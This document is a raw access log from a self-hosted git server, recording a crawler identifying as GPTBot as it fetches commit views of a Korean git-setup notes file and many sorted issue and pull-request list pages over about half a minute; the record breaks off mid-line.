"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71815] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 69776] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71841] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118426] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71812] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71844] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 115843] [Gzip 6.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118288] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118292] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 114340] [Gzip 6.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118256] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11204] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:19:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr 